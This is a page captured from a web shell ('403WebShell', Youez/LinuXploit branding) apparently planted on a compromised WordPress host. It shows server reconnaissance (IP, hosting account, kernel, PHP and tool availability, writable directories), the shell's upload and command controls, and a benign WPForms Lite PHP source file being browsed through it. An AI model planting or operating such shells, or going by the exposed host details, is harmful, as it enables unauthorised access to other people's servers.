????JFIF??x?x????'403WebShell
403Webshell
Server IP : 104.21.112.1  /  Your IP : 216.73.216.145
Web Server : LiteSpeed
System : Linux premium151.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
User : tempvsty ( 647)
PHP Version : 8.0.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/self/cwd/wp-content/plugins/wpforms-lite/src/Admin/Education/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/cwd/wp-content/plugins/wpforms-lite/src/Admin/Education/AddonsListBase.php
<?php

namespace WPForms\Admin\Education;

/**
 * Base class for all "addons list" type Education features.
 *
 * @since 1.6.6
 */
abstract class AddonsListBase extends AddonsItemBase {

	/**
	 * Display addons.
	 *
	 * @since 1.6.6
	 */
	public function display_addons() {

		array_map( [ $this, 'display_single_addon' ], (array) $this->get_addons() );
	}

	/**
	 * Get addons.
	 *
	 * @since 1.6.6
	 *
	 * @return array Addons array.
	 */
	abstract protected function get_addons();

	/**
	 * Ensure that we do not display activated addon items if those addons are not allowed according to the current license.
	 *
	 * @since 1.6.6
	 *
	 * @param string $hook Hook name.
	 */
	protected function filter_not_allowed_addons( $hook ) {

		$edu_addons = wp_list_pluck( $this->get_addons(), 'slug' );

		foreach ( $edu_addons as $i => $addon ) {
			$edu_addons[ $i ] = strtolower( preg_replace( '/[^a-zA-Z0-9]+/', '', $addon ) );
		}

		if ( empty( $GLOBALS['wp_filter'][ $hook ]->callbacks ) ) {
			return;
		}

		foreach ( $GLOBALS['wp_filter'][ $hook ]->callbacks as $priority => $hooks ) {
			foreach ( $hooks as $name => $arr ) {
				$class = ! empty( $arr['function'][0] ) && is_object( $arr['function'][0] ) ? strtolower( get_class( $arr['function'][0] ) ) : '';
				$class = explode( '\\', $class )[0];
				$class = preg_replace( '/[^a-zA-Z0-9]+/', '', $class );

				if ( in_array( $class, $edu_addons, true ) ) {
					unset( $GLOBALS['wp_filter'][ $hook ]->callbacks[ $priority ][ $name ] );
				}
			}
		}
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit